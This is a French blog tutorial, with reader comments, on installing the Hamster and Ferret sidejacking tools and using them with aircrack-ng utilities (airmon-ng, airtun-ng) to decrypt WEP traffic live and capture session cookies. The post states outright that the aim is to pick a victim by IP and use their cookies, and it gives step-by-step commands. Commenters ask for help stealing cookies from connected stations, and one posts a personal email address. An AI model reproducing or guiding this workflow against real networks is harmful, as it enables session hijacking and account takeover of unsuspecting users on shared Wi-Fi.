Il y a peu hamster et ferret sont sortient en v2, hamster est un outil de sidejacking, et avec celui la vous pouvez récupérer en direct les cookie sur réseau ouvert ou encryptés en wep, donc voici un petit tuto sur son installation et utilisation.comme outil du même style on a wifizoo seulement il est pas possible de l'utiliser sur du wep à la volé, on peut capturer avec airodump-ng décrypter avec airdecap-ng et ensuite passer le pcap à wifizoo.
Donc ici l'interet c'est de pouvoir décrypter à la volé l'encryption, et pouvoir utiliser les cookies de la victime.
Autre truc sympa avec hamster et ferret c'est qu'il logue tout par ip, vous pouvez donc choisir une victime.
Bon on va voir comment l'utiliser sur du wep :)
installation, sous ubuntu jaunty, je l'installe dans /pentest/wireless après a vous de voir ou vous l'installer...
(si vous avez pas pentest wireless)
sudo su
cd / && mkdir pentest && cd pentest && mkdir wireless
sudo su
apt-get install libpcap-dev
cd /pentest/wireless
wget http://hamster.erratasec.com/downloads/hamster-2.0.0.zip
unzip hamster-2.0.0.zip
rm -f hamster-2.0.0.zip
mv hamster hamster2 && cd hamster2/build/gcc4 && make
cd /pentest/wireless/ferret/build/gcc4 && make
cd /pentest/wireless && mkdir hamster
cp /pentest/wireless/ferret/bin/ferret /pentest/wireless/hamster
cp /pentest/wireless/hamster2/bin/favicon.ico /pentest/wireless/hamster
cp /pentest/wireless/hamster2/bin/hamster /pentest/wireless/hamster
cp /pentest/wireless/hamster2/bin/hamster.css /pentest/wireless/hamster
cp /pentest/wireless/hamster2/bin/hamster.js /pentest/wireless/hamster
cd /pentest/wireless
rm -rf ferret
rm -rf hamster2
Voila pour l'installation.
Maintenant tout est dans cd /pentest/wireless/hamster
vous avez le binaire de hamster et de ferret
./ferret -h
options:
-i
Must have libpcap or winpcap installed to work.
-r
using "ferret -r *.pcap". Doesn't need libpcap to work.
ferret n'est pas specialement utile pour une capture en live, dans le sens ou vous pouvez directement le controller via hamster et son interface web
la difference est que si vous directement hamster, votre pcap sera dans temp alors que si vous lancez:
./ferret -i wlan0
./hamster
la votre pcap (fichier de capture sera dans cd /pentest/wireless/hamster)
apt-get install aircrack-ng
si vous ne l'aviez pas déja
On va utiliser airtun-ng comme dans le tuto wireshark
airmon-ng start wlan0
wlan0 est mon interface que je place en mode monitor
je decide d'enregistrer un fichier -w w (nommé w)
je lance la capture sur le channel -c 11 (11)
wlan0 mon interface en monitor
airtun-ng -a 00:11:22:33:44:55 -w 21:12:21:12:21 wlan0
-a l'@ mac du routeur
-w la clé wep
wlan0 mon interface
ifconfig at0 up
(laissez tourner airodump-ng et airtun-ng pour que cela fonctionne)
maintenant soi je lance hamster et ferret, soi juste hamster
./ferret -i at0
./hamster
avec votre navigateur internet rendez vous ici:
(si vous avez pas lancé ferret, pour activer votre sniff, rendez vous depuis l'interface web dans 'adapter' et remplacez eth0 par at0)
Voili voilou
Site officiel hamster
crack de clé wep et wpa
Un problème? Venez en parler sur le forum, tout a une solution :D
22 commentaires:
Je ne sais pas pourquoi mais je ne peux pas lancer hamster en tapant simplement "hamster". Je suis obligé d'aller le chercher... Enfin bref il se lance mais à la fin je finis toujours par avoir cette erreur: execle(ferret): no such file or directory.
Une idée d'où ça peut venir?
tu n'as pas du bien suivre l'installation car il ne trouve pas ferret
Ouep il me dit qu'il est mal install et que je peux l'install en tapant apt-get install ferret (ce qu'il n'arrive pas à faire mais soit)
mais pourtant ferret est bien là dans /pentest/wireless/ferret et je peux le lancer à partir de là...
faut que le binaire de ferret soi dans le meme dossier que le binaire de hamster
J'ai refait la manip et j'ai maintenant dans /pentest/wireless/hamster le fin de ferret, le bin de hamster, favicon.ico, hamster.js et hamster .css mais j'ai toujours la même erreur...
faut que tu sois en root sinon ferret pourra pas débloquer ton interface wifi
root, ou sudo
ex:
sudo ./ferret -i at0
dans un autre shell:
./hamster
Je suis en root depuis le début. A noter que hamster ne se lance pas non plus par la commande...
tu le lance bien depuis le bon répertoire ?
car sinon il faut le placer dans usr/bin si tu veux le lancer de n'importe ou
Oui je suis bien dans le bon répertoire... Je ne comprends vraiment pas d'où ça peut venir :/
quel os ?
Ubuntu
étrange
si tu fais ca sur du wep, tu as bien fait un ifconfig at0 up
?
Vi je l'ai fait
bein chez moi ca fonctionne nickel :/
test un apt-get install libpcap0.8-dev
bah du meme style que surfjack mais marche til sur backtrack ?en passanr peut on volé les cookies de sur une station connecté ?
oui ca fonctionne sur backtrack, et oui pour une station connecté
ok aurai tu le tuto pour voler les cookies d'une station ?
exuse pour le double message mais si lors du scan et de captur il ya aucun data pourron ton voir les cookies ?
si, y a pas de datas, pas de cookies
Je n'ai pas compris l'installation (je ne suis vraiment pas douée), pourrais-tu l'expliquer un peu plus en détail, s'il te plait ?
Je te laisses mon adresse e-mail, au cas où. (Marielle.6@hotmail.co.uk : C'est une adresse de remplacement, l'autre a été piratée et je vais tenter de la récupérer.)
Le lien pour dl hamster est mort. Un autre lien peut-être ?
Merci.
wget http://www.erratasec.com/erratasec.tar.z
Enregistrer un commentaire